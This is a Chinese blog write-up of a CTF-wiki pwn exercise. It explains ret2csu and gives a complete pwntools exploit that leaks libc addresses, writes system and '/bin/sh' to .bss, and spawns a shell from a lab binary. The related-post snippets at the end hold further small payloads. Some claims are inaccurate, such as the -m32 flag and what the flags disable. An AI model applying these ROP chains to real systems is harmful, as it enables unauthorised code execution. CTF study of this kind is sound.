wikiCTF-pwn-ret2csu

最新推荐文章于 2024-08-09 02:54:28 发布
最新推荐文章于 2024-08-09 02:54:28 发布
阅读量431 收藏 3
点赞数
文章标签: linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51521220/article/details/127434934
版权

ret2csu

在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。 这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。这个函数是用来对 libc 进行初始化操作的,而一般的程序都会调用 libc 函数,所以这个函数一定会存在。我们先来看一下这个函数 (当然,不同版本的这个函数有一定的区别)
也就是通用gadgets
ret2csu—通用gadgets
复现level5

编译
gcc -m32 -fno-stack-protector -z execstack -o level5 level5.c

-m32意思是编译为32位的程序
-fno-stack-protector和-z execstack这两个参数会分别关掉DEP和Stack Protector

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 512);
}

int main(int argc, char** argv) {
    write(STDOUT_FILENO, "Hello, World\n", 13);
    vulnerable_function();
}

在这里插入图片描述

首先是栈溢出漏洞,其次,由于是64位程序,所以需要控制gadgets,
这里使用的是通用gadgets
也就是ret2csu

利用过程:

  • 第一通过栈溢出 泄露write的got
    然后就是通过libc中的偏移
    计算出system的got
print("##### get write_addr #####")
payload1 = 'a'*0x88
payload1 += p64(csu_pop_addr)
payload1 += p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)
payload1 += p64(csu_mov_addr)

payload1 += 'a'*0x38
payload1 += p64(func_addr)
p.recvuntil("Hello, World\n")
p.send(payload1)
write_addr = u64(p.recvn(8))
print(hex(write_addr))

system_addr = write_addr - offset_addr
bin_sh = write_addr - bin_sh_addr
print(hex(system_addr)+","+hex(bin_sh))

这里一个是可以用Libcsearcher库找libc文件
另一个就是通过ldd查看二进制文件的libc文件
ldd level5
在这里插入图片描述

  • 第二个payload就需要写入system的地址和‘/bin/sh’字符串
    因为在csu中,system的参数是由edi传入的
    只能传入4字节地址
    但是实际使用时rdi,8字节
    这里向bss写入则是因为bss的地址长度就是4字节长度
    在这里插入图片描述

payload2

print('##### load bin_sh to bss ')
payload2 = 'a'*0x88
payload2 += p64(csu_pop_addr)
payload2 += p64(0)+p64(1)+p64(read_got)+p64(16)+p64(bss_addr)+p64(0)
payload2 += p64(csu_mov_addr)

payload2 += 'a'*0x38
payload2 += p64(func_addr)
p.send(payload2)
sleep(1)
p.send(p64(system_addr)+"/bin/sh\0")
  • 最后就是获取shell了
print("##### get--shell #####")
payload3 = 'a'*0x88
payload3 += p64(csu_pop_addr)
payload3 += p64(0)+p64(0)+p64(bss_addr)+p64(0)+p64(0)+p64(bss_addr+8)
payload3 += p64(csu_mov_addr)

完整exp

from pwn import *

elf = ELF("level5")
libc = ELF("libc.so.6")

p = process("./level5")

##### address #####
csu_pop_addr = 0x40061a
csu_mov_addr = 0x400600
bss_addr = elf.bss()
func_addr = elf.symbols['vulnerable_function']
offset_addr = libc.symbols['write'] - libc.symbols['system']
bin_sh_addr = libc.symbols['write'] - libc.search('/bin/sh').next()
write_got = elf.got["write"]
read_got = elf.got['read']
##### payload1 #####
print("##### get write_addr #####")
payload1 = 'a'*0x88
payload1 += p64(csu_pop_addr)
payload1 += p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)
payload1 += p64(csu_mov_addr)

payload1 += 'a'*0x38
payload1 += p64(func_addr)
p.recvuntil("Hello, World\n")
p.send(payload1)
write_addr = u64(p.recvn(8))
print(hex(write_addr))

system_addr = write_addr - offset_addr
bin_sh = write_addr - bin_sh_addr
print(hex(system_addr)+","+hex(bin_sh))

##### payload2 #####

"""

print("##### get--shell #####")
payload2 = 'a'*0x88
payload2 += p64(csu_pop_addr)
payload2 += p64(0)+p64(1)+p64(system_addr)+p64(0)+p64(0)+p64(bin_sh)
payload2 += p64(csu_mov_addr)

payload2 += 'a'*0x38
payload2 += p64(func_addr)
raw_input()
p.send(payload2)

"""
##### this is wrong payload2,bin_sh is 8bytes,but edi is 4bytes so must to move to bss(4bytes address)

print('##### load bin_sh to bss ')
payload2 = 'a'*0x88
payload2 += p64(csu_pop_addr)
payload2 += p64(0)+p64(1)+p64(read_got)+p64(16)+p64(bss_addr)+p64(0)
payload2 += p64(csu_mov_addr)

payload2 += 'a'*0x38
payload2 += p64(func_addr)
p.send(payload2)
sleep(1)
p.send(p64(system_addr)+"/bin/sh\0")

##### payload3 #####
print("##### get--shell #####")
payload3 = 'a'*0x88
payload3 += p64(csu_pop_addr)
payload3 += p64(0)+p64(0)+p64(bss_addr)+p64(0)+p64(0)+p64(bss_addr+8)
payload3 += p64(csu_mov_addr)
#raw_input()
p.send(payload3)
p.interactive()

结果
本地打通了 远程倒还没试(没搭过QAQ)
在这里插入图片描述
结束~

Oops-re
关注
CTFWiki-pwn
qq_55233040的博客
05-03 1510
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
ret2csu
huzai9527的博客
02-19 333
ret2csu 1. 原理 在64位程序中,函数的前六个参数是通过寄存器传参的,但是大多数时候,我们很难找到每个寄存器对应的gadgets,这个时候我们可以用x64下的__libc_csu_init中的gadgets。这个函数是用来对libc进行初始化操作的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000
PWN-ret2csu
recover517的博客
12-06 570
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
pwn学习笔记(9)-中级ROP--ret2csu
最新发布
qq_66013948的博客
08-09 356
​ 首先是64位文件的传参方式:前六个参数是从左到右放入寄存器:rdi、rsi、rdx、rcx、r8、r9,之后的通过栈传参。​ 比如:传参函数大于7个:h->(%esp)g->(%esp)call H​ 之后反汇编一下main函数和H函数的代码​ 很明显的就是前六个参数是寄存器传参,剩下两个就是栈传参。
PWN:[WEEK2]ret2csu
m0_53932372的博客
10-19 237
pwn
pwn中级ROP——ret2csu
turtlesd的博客
04-27 980
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
wikictf-boverflow
测试
09-13 229
  wikictf上的一道题:链接:https://pan.baidu.com/s/183xQZQS7YwVFCoMhtX9dtg 密码:ep5s  可以看到文件时.dms结尾的文件,没见过,不过我们先用010editor分析一下他的结构:   是elf文件,是Linux下的可执行文件,Linux是不以后缀来区分文件类型的,所以到Ubuntu运行一下程序: ...
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1359
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
pwn技巧之ret to libc
这里没人
05-14 2464
简介 在0day攻击当中有许多的技巧,这次介绍一种常用的攻击手段。ret to libc与栈溢出,堆溢出之类的漏洞利用技巧有所不同。ret to libc是一种在漏洞攻击中的常用的思路。目的是最大化利用所发现的漏洞,实现我们最终的目标get shell 首先,我们来认识一个c语言的库函数 int system(const char * string); 这个函数的的功能很简单,执行...
gdb 查看是否 栈溢出_入坑 CTF-PWN 之 栈溢出入门
weixin_36064196的博客
01-17 779
好久没看过pwn题目了,写一个入门的教程顺便复习了:1. 安装gdb-pedagit clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbinitecho "DONE! debug your program with gdb and enjoy"2. 一些比较有用的技巧...
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 394
PWN-栈溢出之ret2csu
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 3165
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
CTFWiki_PWN_LinuxPlatform_UserMode_Exploitation_StackOverflow_x86
A的博客
06-14 694
先看这个文章学习函数调用栈出栈时RIP指向栈存放函数返回地址的位置,这个地址我们可以改为一个汇编指令的地址,RIP一直往后面指,以那个地址为起点一直往后执行 把函数返回地址设为0804863A,会一直往后执行 ret2shellcode 把恶意汇编代码写到数组(代码块)里面,返回地址指向这个数组(代码块)首地址。 这个数组要可读写执行,全局变量(.bss)有这个特点 ljust() 用法 shellcraft.sh() 打印结果 计算偏移disass main反汇编 main 函数找到 main 的第一条指
pwn刷题num48----syscall + ret2csu
tbsqigongzi的博客
05-04 958
BUUCTF-PWN-ciscn_2019_s_3 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 (这里为了省事,自己写了一个小shell脚本) 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出 syscall 系统
ctf wiki pwn(入门实操)
至臻求学,胸怀云月
01-11 2463
gets函数溢出 源码 #include <stdio.h> #include <string.h> void success() { puts("you are succeed!"); } void volunter() { char s[12]; gets(s); puts(s); re...
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2291
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
跟着CTF-wikipwn——ret2shellcode
qq_42882717的博客
07-01 869
CTF-wiki的注解:ret2shellcode
跟着CTF-wikipwn——前言
qq_42882717的博客
06-18 1483
对于有一定pwn基础的同学来讲,CTF-wiki就是yyds,绝绝子,很上头呀。不过简洁有力的另一方面,是细节不彻底,因此本系列文章专为解决CTF-wiki的细节问题
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值